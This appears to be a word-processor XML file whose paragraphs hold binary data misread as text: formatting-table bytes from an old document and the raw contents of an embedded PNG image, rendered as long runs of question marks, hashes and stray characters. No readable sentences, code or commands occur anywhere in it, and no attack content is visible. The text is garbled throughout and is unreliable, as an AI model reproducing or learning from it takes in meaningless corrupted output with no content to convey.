        <w:tab/>
        <w:t>#&amp;?#$#.??#If####WD##a$#gd</w:t>
        <w:br/>
        <w:t>#?#####Ff?#######$##$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####a$#gd</w:t>
        <w:br/>
        <w:t>#?###|.##~.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.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$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####gdv#?#####Ff?+######$##$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####a$#gd</w:t>
        <w:br/>
        <w:t>#?######$#</w:t>
        <w:br/>
        <w:t>&amp;##F###$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####WD##a$#gd</w:t>
        <w:br/>
        <w:t>#?#####Ff?%####?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.###/###/###/###/###/##</w:t>
        <w:br/>
        <w:t>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/###/###/###/###/###/###/###/##&amp;/##(/##*/##,/##0/##2/##?????????????????????????????????????????????????###,#h?#?##h?x?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####&amp;#h?x?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####)#h?#?##h?x?#B*#CJ##OJ##QJ##^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h!U##h?x?##)#hh!U##h?x?#B*#CJ##OJ##QJ##^J##aJ##ph####,#hh!U##h?x?#B*#CJ##OJ##QJ##^J##aJ##o(#ph####7?.##?.##?.##?.##?.##?.##?.##?.##?.###/###/###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/###/###/###/###/###/##(/##./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Ff28######$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####gd</w:t>
        <w:br/>
        <w:t>#?######$#</w:t>
        <w:br/>
        <w:t>&amp;##F###$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####WD##a$#gd</w:t>
        <w:br/>
        <w:t>#?#####Ff?1######$##$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####a$#gd</w:t>
        <w:br/>
        <w:t>#?###./##0/##4/##8/##&lt;/##@/##D/##F/##J/##L/##N/##^/##f/##h/##j/##l/##n/##p/##r/##?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?################################$##$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####a$#gdv#?#####$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####gdv#?######$#</w:t>
        <w:br/>
        <w:t>&amp;##F###$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####WD##a$#gdv#?#####Ff'&gt;######$##$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####a$#gd</w:t>
        <w:br/>
        <w:t>#?###2/##4/##6/##8/##:/##&lt;/##&gt;/##@/##B/##D/##H/##J/##L/##N/##T/##\/##^/##d/##r/##v/##x/##z/##~/##?/##??????????????w?w?p?V&gt;#####/#hh!U##hv#?#5#?B*#CJ##OJ##QJ##\#?^J##aJ##ph####2#hh!U##hv#?#5#?B*#CJ##OJ##QJ##\#?^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h!U##hv#?##)#hh!U##hv#?#B*#CJ##OJ##QJ##^J##aJ##ph####,#hh!U##hv#?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####&amp;#hv#?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####)#h?#?##hv#?#B*#CJ##OJ##QJ##^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h!U##h?x?##,#hh!U##h?x?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####)#hh!U##h?x?#B*#CJ##OJ##QJ##^J##aJ##ph######r/##t/##v/##x/##z/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?###############################d,####?x#G$#H$#l?#!###?@#############0$?gdpU?#####Ff#J######$##$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####a$#gdv#?######$#</w:t>
        <w:br/>
        <w:t>&amp;##F###$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####WD##a$#gdv#?#####Ff#D######$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####gdv#?###?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/##?/###0###0###0##*0##V0##?0##?0##?0##?0##?0##?0##?0###1##?????????????????~xngagaZgagaZgaZg#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h##?#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(###h7$###h?###CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?.##CJ#####h</w:t>
        <w:br/>
        <w:t>#?##h</w:t>
        <w:br/>
        <w:t>#?#CJ##o(#*#h</w:t>
        <w:br/>
        <w:t>#?#B*#CJ##OJ##PJ##QJ##^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h!U##hv#?##)#hh!U##hv#?#B*#CJ##OJ##QJ##^J##aJ##ph####,#hh!U##hv#?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####/#hh!U##hv#?#5#?B*#CJ##OJ##QJ##\#?^J##aJ##ph####,#hv#?#5#?B*#CJ##OJ##QJ##\#?^J##aJ##o(#ph#####?/##?/##?/###0##,0##.0##?0##?0##?0##?0##?0##d1##?1##?1##?1###2###2##f2##h2##l2##?2##?2##?2##f5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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##dh###WD?#`??#gd?e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,####?x#G$#H$#gd##?##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##d,####?x#G$#H$#^??######$#a$##</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$####1##b1##d1##t1##?1##?1##?1##?1###2###2##42##&gt;2##B2##D2##R2##Z2##^2##`2##j2##l2##?2##?2##?2##?2##?2##?2##(3##*3##?3##?3##?3##?3##?4##?4##d5##f5##n5##p5##?5##?5##?6##(7##*7##27##47##R7##?7##?7##?????????????????????????????????????????????#################h?=?##h?e?#CJ##o(###h?S?##h?e?#CJ###</w:t>
        <w:br/>
        <w:t>#h?e?#CJ#####h}t?##h?e?#CJ#####ht#?##h?e?#CJ##o(###h?S?##h?e?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?e?#CJ##o(###h?e?##</w:t>
        <w:tab/>
        <w:t>#h?e?#o(###h?####</w:t>
        <w:tab/>
        <w:t>#h##?#o(#</w:t>
        <w:tab/>
        <w:t>#h?###o(###h?###CJ##PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h##?#CJ##o(###h?###CJH#PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h##?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ##/f5##p5##*7##47##?8##?8##?:##?:##4;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##D&lt;##F&lt;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</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$##########$#a$##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##dh###WD?#`??#gd?e?#####$#</w:t>
        <w:br/>
        <w:t>&amp;##F###??##?#?#dh###1$#@&amp;#WD##^??#`?#?a$#gd?e?###?7##?8##?8##?8##?8##n9##p9##?9##?9##r:##t:##?:##?:##?:##?:##2;##4;##@;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##2&lt;##:&lt;##D&lt;##F&lt;##H&lt;##T&lt;##V&lt;##X&lt;##Z&lt;##\&lt;##`&lt;##b&lt;##??????????????????????????????????????z???r######h7,?#0J##KH#####h7,?#0J##mH##nH##u##</w:t>
        <w:br/>
        <w:t>#h7,?#0J#####j#####h7,?#0J##U####h7,?##</w:t>
        <w:tab/>
        <w:t>#hNHK#o(#</w:t>
        <w:tab/>
        <w:t>#h7,?#o(###hwP?####j#####hwP?#U##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?u?#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ#####h?####</w:t>
        <w:tab/>
        <w:t>#h?###o(###h?###CJ4#PJ##o(###h?=?##h?e?#CJ#####h?=?##h?e?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?e?#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?e?#CJ#####h?h###h?e?#CJ##o(##,F&lt;##\&lt;##^&lt;##`&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;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$##?H#9D##XD##a$#gd?\#######$##?x#YD2#a$#gd?\#######$#a$######$##?h#]?h#a$##########?h#]?h######???#?###&amp;`#$###b&lt;##d&lt;##f&lt;##h&lt;##t&lt;##v&lt;##x&lt;##z&lt;##|&lt;##~&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;###=##</w:t>
        <w:br/>
        <w:t>=###=###=###=##"=##(=##,=##.=##0=##?????????????????????????????????????????????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h?###CJ##o(###h?######h#d?##h7,?#5#?CJ #OJ##QJ##aJ ###h7,?#5#?CJ #OJ##QJ##aJ #o(####hwP?####h7,?##</w:t>
        <w:tab/>
        <w:t>#h7,?#o(###hR###0J##KH##mH##nH##u####j#####h7,?#0J##KH##U####h7,?#0J##KH#####h7,?#0J##KH##o(##0?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;###=##</w:t>
        <w:br/>
        <w:t>=###=###=## =##"=##*=##,=##.=##0=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</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$##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$##?H#9D##XD##a$#gd?\####6#</w:t>
        <w:br/>
        <w:t>0##0#&amp;P</w:t>
        <w:tab/>
        <w:t>#1?###??. ??A!?##"?###??#$??#%?###?S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F#</w:t>
        <w:tab/>
        <w:t>0#</w:t>
        <w:br/>
        <w:t>0##0#&amp;P</w:t>
        <w:tab/>
        <w:t>#1?###0#:p</w:t>
        <w:br/>
        <w:t>#?##??A ??.3P##!??#"??##?##$?##%?###?S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</w:t>
        <w:tab/>
        <w:t>0#</w:t>
        <w:br/>
        <w:t>0##0#&amp;P</w:t>
        <w:tab/>
        <w:t>#1?##:p</w:t>
        <w:br/>
        <w:t>#?##??. ??A!?##"?###??#$??#%?###?S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</w:t>
        <w:tab/>
        <w:t>0#</w:t>
        <w:br/>
        <w:t>0##0#&amp;P</w:t>
        <w:tab/>
        <w:t>#1?##:p?.###??. ??A!?##"?###??#$??#%?###?S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</w:t>
        <w:tab/>
        <w:t>0#</w:t>
        <w:br/>
        <w:t>0##0#&amp;P</w:t>
        <w:tab/>
        <w:t>#1?##:p?.###??. ??A!?##"?###??#$??#%?###?S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n#?'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?S@we?#Y??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5###J#####?</w:t>
        <w:tab/>
        <w:t>_G####sBIT###3#??####sRGB#??#?##??IDATx^??m??Yv#???un?93?F?r????K?#???M?δ??##?#$#&amp;?G##???Q#?P#?#F?###???? ##?#Y #??##?&amp;?zl#?R0??q?Q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#V?]?{??{?????&lt;?Zk???????#?;w????c????^{?/-?{}##?"0?Z????#??b#?/#??v??\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>????m???V}???|??F6##?e??j????"???σ?W?|#?? #0I?</w:t>
        <w:br/>
        <w:t>???c?#?IyNd???#?C??C?ra]?C??7?48?+?@$???0WG+??)Z&amp;T{??#??#??#7SI?-d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???$??#@?#wP?s+??$?I?T??~?f?)?#3?t??P#&lt;</w:t>
        <w:tab/>
        <w:t>D?we?+??w??#???#??????#z???"?u???Ut?o#p?#&lt;|`???#?|W&gt;?#??#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>斸</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,?3??x?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>璨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??&gt;?h?$???l%??#f31?]?|ff?n?##)?&gt;??5?????L?e?+&amp;?#'?#с)?+"Z????b?I0#????+$???????Y#J?hV#?L??&lt;Y??#~?###??????#?Z}##*?#f??X?s?9C????=??tnUr{#???h?#?????1??'??l?zq#?E??#?????U]??</w:t>
        <w:br/>
        <w:t>?F?S?%?0T~{T??,S4tS&amp;???lV???#????C???f?N??#Q?L&amp;'?##?&lt;I[??R???\6????+#&lt;??D?#???*?/#??6?{?#i?T?n??H?</w:t>
        <w:tab/>
        <w:t>gjC7wVW?#?Ak????y#?##?????##???#??A?\?#?^#?9?????o?</w:t>
        <w:tab/>
        <w:t>}Np?[?????L#??i#???T?j???????#???a^?U?m#|!#]?3?a?X/???6?/##?#Kck???cGG?G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w?vf?.~???#??θ?Jz????8^}lu}u????&gt;????b?zy?/?????#/?#?i.?7?###b]4#?</w:t>
        <w:br/>
        <w:t>f?W#U1o?????#?s???q??##?X|?&lt;??If#TG#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]m??????&lt;M)\?.?#?#??w???o;?O##?????S???~G??i?}??'N|?h?zD?=???F?2??=:?~t}??#?]?#??Yu?5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?#?p?,&amp;??#35?O9?'(?/J&gt;??x##?#?e????7ù</w:t>
        <w:br/>
        <w:t>#3?'?8??.?#???N??4???L0?????~#?m?\#??#?u??-#9?K????D#?????##;?=o??=?e=##?##?L2?,?2?z</w:t>
        <w:br/>
        <w:t>?{#??)%#?/???P[?U#???R?Z??6?&lt;?*R4????t??{1?\??lX#??D?nd???\ZL#b\?]??A8MVQ5??#?0?L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a?M???w?v???????#c#E??\6=:??z?īfHi?_?u???/??l?"EU?????##???#?B;0?&amp;a?#?g#f?oAf?dI???w,`?[???##.#.##a!i??#G?##?#?BM#??%?#!??##?+a??lO0???1?{?##M?^?p#(/?A?d?</w:t>
        <w:tab/>
        <w:t>??#?1f#r9?O????&amp;/???K8??6?X???#7???r{?T??R?7#???BD?jk'??Jl`?:Z???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/#???{???*??e#?"#7?:?v?B</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>逨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>]Zt???#~?x?Nj??&amp;??:y?&lt;??0??[8???2&amp;?s?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>焭</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Y?%?##??C??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^xBE??`?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>鱏</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??A??g[?uH?#u???c?</w:t>
        <w:br/>
        <w:t>??y?v?+E'??#?wfk#?-?la:??B?Q?k^??[?p??^2?jP+x?#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##?p??h??!ZM??7#@??#8?s????{#?B??#?#?#-V?y??#???l?0?t#r??R?b?#?V:n???#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?[#d?fg(H?H??*8??:?mb??q??##??;{r??#?78#????~?7?#?~???????w?}?+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/?~??Skeg?r???O???'7?Gk????]?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>m]?9lVU??#?#K???</w:t>
        <w:tab/>
        <w:t>????'?P9?#^??G#?c??K|??^6??I??)??nk?SX???j.?z???#??M?EC# '???\?z????</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>磀</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?f??J??K#?,?y??v??#zU?3??#I?@???#N#?m#???;???_???;UJ?x#?/???)???7??2???7??????????V?cC?G</w:t>
        <w:br/>
        <w:t>;??#?m#???#?M.O#?!V#</w:t>
        <w:tab/>
        <w:t>?s?@????V? Y??#?oS???sx??#?vW+???c?s)???F@?#??#??n7???p5_#j~#??9#&gt;#?Y?#??^DD?YI~?!??#?#J?###?v?_?A??ko???##|?###?pku????%^z?M?W?8??9???|?g???~v??w?l??-T?]??#?-?.&gt;*?</w:t>
        <w:br/>
        <w:t xml:space="preserve">j%.?Z?P+???te-#???ZQ </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>????V??iJ??G??!Y?#VT??t?a???l#?t,U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H???h##&lt;??##??#??{:?g??qV?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>o##)#?2ó)?#?##;(h#)?s??a??*?#?z?@J#&lt;????_????/???j#?h??X,?`??????&amp;?UR???r???????:\@q##:</w:t>
        <w:br/>
        <w:t>z#K?L#R?A?#???'?Y??4?R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##?A#8o???1?lW ?J????AH??y#+??F?+:???^????#??????xZ#?h#</w:t>
        <w:tab/>
        <w:t>i?a?}?##?X???|u##-?c??M\&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>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I?n???????/x??~?cA?#?&lt;??#?nj##Q?_v1#?V????????????4#??e#?????va??V?E~{u-~???*???#?b#?qXy???;W??z?#??luk#???*??!d?S???#????FVXo?##?\?W#?]?#$j????#?'J?$Q#?._2"?D??i#R??5("#?i?#??T^7KH??KQ$$&gt;OL?#?2##H?#?#??f?#???@?N?b@?</w:t>
        <w:br/>
        <w:t>\#x#&amp;?????s???{?Xb?#)M??G??hq?'?0???#x?#?A??1?|^=???YW8#x?s???S????gK?????9w./??.Q?6T#p?? l#?j?J???G?3?V#?#???????#m?</w:t>
        <w:br/>
        <w:t>??)H?`#??Z??λU7?????&gt;&amp;-?#R#T?#Z????XZ?`?????@.?)#?3??N?#l^16?T?#?d?M$???c ??+??#[#`a?Z?L9#?T</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>U???A?S#?ub?2F???Ke?hqy?????!|{?#X"#?H????:???_?'w=?xg:?_5~?4?#?-???v??????O?y???#q??z?F?m?2-?#???#O?X???u????a#?}?s??????p?#?(s?###wv?l?#???}?m?,?"?a|#?#?#????? @5??u??L?&amp;#`?C[???0?:?B?*U-g???S??jB?m????{#???6##?L??R##?????????&amp;?W2???#d??q?e????#???????C?{u#=*?qn</w:t>
        <w:br/>
        <w:t>#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@v/??T??c?#1TL???g?????(?,6?bt7?$?zU??ZZ??%n#?d?j??????z?Be4?Z&amp;?Q?i??!?R?#3##8??????a???A2[L??A??d"???w{?N?#z????SR!#T?DAU???j??onB##uP#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>瀮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Z2??pI??Pe??</w:t>
        <w:br/>
        <w:t>|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K?h?t??#?!?????O????;??y???S???Z)?T??ū??????#?G??#????pch???L#:?me3??~*?u`??:?V??$ye#&gt;???2??ZI#?x?#???)?]???b:??ec7??'B???(???(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XЕ?kh?7?~??(5??)z?'??</w:t>
        <w:tab/>
        <w:t>+:?v?d????ì?#?Wb?хu??Y57????c??T.?=&amp;?d?#???8?n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?#?L?#?#T{k#??7#??v'?????_??o}=Dt#?@#_=?[?O??o???wr??\??&lt;#??g?C???2#U7?+6?A???%??v??#13????AE&gt;?}F?#??#?1e?A?'?##??s?#g?#?l??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5#"??9#</w:t>
        <w:br/>
        <w:t>??#????q?#?h_??y??o?#&gt;??:????g_??#??*?j? $X#?????fl?#3?|##6?y?###o????!?]?2</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>穴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??o##9??#'?A_#Q&lt;V??#?He?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??#??M8?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Z????5???X??g?#?#:#??o?|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? R?#?#???b???i?a?$P??ON@G?-&lt;#??2P#|#l??lE?#zJi&lt;q"#?h#??@? ##7?Zo?B#?K#???#ɑ?"?)q??_??4?#7??#?#~#E??hI?F#?#**)0R?gX&lt;+#1?d}[ ?\vWy?xJ2)???]Yj?teìk?E#H?V6?{oV??1??^??e#?HA?#G?#?$?%c?i??#?6v?#C$1?#?,T*s??T???"????&lt;?</w:t>
        <w:tab/>
        <w:t>??</w:t>
        <w:tab/>
        <w:t>#???7V??^2?T??)?A?\#????j??&amp;?(g7?/??{?????F&lt;!GY?C=?#?#)MH?oQ?#??3K??J?)?#l?%??&lt;? ??8??#Q0?q#?d?z#G???N??n?!??V?#&lt;????N??adI?5?*??#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e??#?=??#??v?#?R?&amp;?K?7?R?+2#?#?ZX2?.#u?FlT?????#!??#?#MmO^==??O??f8?#??_???d?'??Z???????n#A?Α??&amp;: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O4?#?U??`j|6#?##Y8_]??A5??##?E??.E??|?vZ??%?2?X##G#??,??#?]gq?`??' ?n1R#`???</w:t>
        <w:br/>
        <w:t>?k??\2e 9#q?OhL?##p#?m??o#`??i??k?;]?z&gt;##??4]?#?#???+##?.</w:t>
        <w:br/>
        <w:t>Y?F?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??&gt;&lt;????a?P????za!#Ch?id?BB?\????g{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=?w#g??4??YR7_;3~2E???^#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sTN#?^W???R#????</w:t>
        <w:tab/>
        <w:t>?^#[^ zRE???*#??Tf??Gj??Q_?#0d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?#F~??i???vW?#?*??7&lt;)S??#?L#?[&amp;?###??`Q!P????/??f??y6pXQ8l?#]??a#`#B?J?#.??i_?WP#?,f8|??#r???#K?7????I?P?Y??,???S???i??.^=?????#??pG3.?`!?!#"?T#Il??#???2#]Vo'D?'i?:&gt;##</w:t>
        <w:br/>
        <w:t>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??#??"?`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*?Ν?</w:t>
        <w:br/>
        <w:t>7????@7????i?#??fo?J?&lt;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b4^?|??#dkjV#?m?G:?\1?#?#X#/#?J@??ɡ#xd?L?%?##$?z;?U?.U??#?.l???|????o&gt;?v{??M#???}?8sO???#?i?G'H??fy?#\r?n?4#?P?&lt;&lt;?????Jap?#?p??##&lt;Ut_H??z???O?d#?##?|??r???Q??b#z`E##K?|???#N???А?V</w:t>
        <w:tab/>
        <w:t>?r???[?U#?#??=?#TIc??????Be?#?F??j????[Ul?????3ω?T#??#??jb?/#??I?@K???.??&lt;#I{ #;iS,k|k?]?,?N4&gt;??S???|??P?r;#?m?#SP]??5G#"????Wu??H??</w:t>
        <w:tab/>
        <w:t>&lt;@??.??y1kj,c?#J?M?????#d?#??????#[#?2O?6?_L`#r?##?^?#0hoez#??????3}??#?v??L9?#7?#? ?f?G?#4?~g#(???l??#?!?G?W???0?#i?L"?#d?4?V?????V?X?g?-?m:"=??&amp;#?xG?K?xo??T?l_??W?=? ?#0???#-?#?????#?YT9???#@5?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 $6????#z?$??l}??GkJ??#?$##?#8?$#$@??\??##?l</w:t>
        <w:br/>
        <w:t>#&gt;?,F???#?~????!t#?b?#}\?q"?#?~#8?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Q????d?X#?#???????pd(;) ?H1??Z??????hw?#????+kkm??N?#oM?F#?,?v]???#!??i?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>旡</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>X?0#sj?_??#???ev??B$?-?s#T\??J?#1&gt;?h"</w:t>
        <w:tab/>
        <w:t>??+o?]&gt;#???f?s??|??@?#?#?#???"???X$V??*#B?R??#j&lt;?#?#????+?&gt;????k#j?A+C?^H?^??:"^?7#??#*?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1??] #?h?j#?6?Y]?m?KR#?Cu?#?(??p^D?&amp;?ID??_TdN1???????1C?"Z???u?f5??O?g??"c??T?.?#???s??p&amp;Y"\??\?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#??:?P??f#+i???3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z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#K,y??#???s1\??J[n)?V#?#??#q?????$#????d?j#?#??;?;#B?Z???#0H?i#*?&amp;</w:t>
        <w:br/>
        <w:t>?#Y?'$???C#?????4????#x??rI.}?#??af#U&amp;K?NK?#$??b??</w:t>
        <w:br/>
        <w:t>Y?E#?+</w:t>
        <w:tab/>
        <w:t>??OI?h???$h8~???E?I??j7???#c#??[W#?##?r??#??sF+L}?R9?t.I?mю?t-Z??p5#&gt;?#}#??r.ds??z??#"??#</w:t>
